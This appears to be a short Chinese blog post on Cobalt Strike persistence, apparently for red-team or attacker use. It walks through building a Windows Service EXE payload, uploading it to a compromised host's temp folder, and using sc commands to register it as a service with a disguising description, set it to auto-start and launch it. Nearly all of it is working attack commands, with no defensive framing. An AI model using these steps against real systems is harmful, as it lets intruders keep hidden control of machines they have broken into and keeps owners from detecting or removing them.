cs-权限维持

肉鸡上线后很容易掉线，因此需要再放入一个payload，借用window的注册表或者计划任务进行权限维持

#1

新建一个payload，Attack—Packages—Windows Executable（S）

选择Windows Service EXE

在桌面上生成好了一个payload

#2

右键肉鸡interact

cd c:\windows\temp  
upload /home/kali/Desktop/b.exe
#上传payload
shell sc create "thisserver"binpath="c:\windows\temp\b.exe"
#创建一个关联payload的服务
shell sc description "thisserver" "zhe shi fu wu"
#对刚生成的服务进行伪装
shell sc config "thisserver" start=auto
#让服务变为自动启动
shell net start "thisserver"
#启动服务

#技术基础 #Cobalt Strike

cs-权限维持

http://example.com/2023/12/03/cs权限维持/

Author

w1t2f3

Posted on

December 3, 2023

Licensed under

flask Previous

钓鱼攻击 Next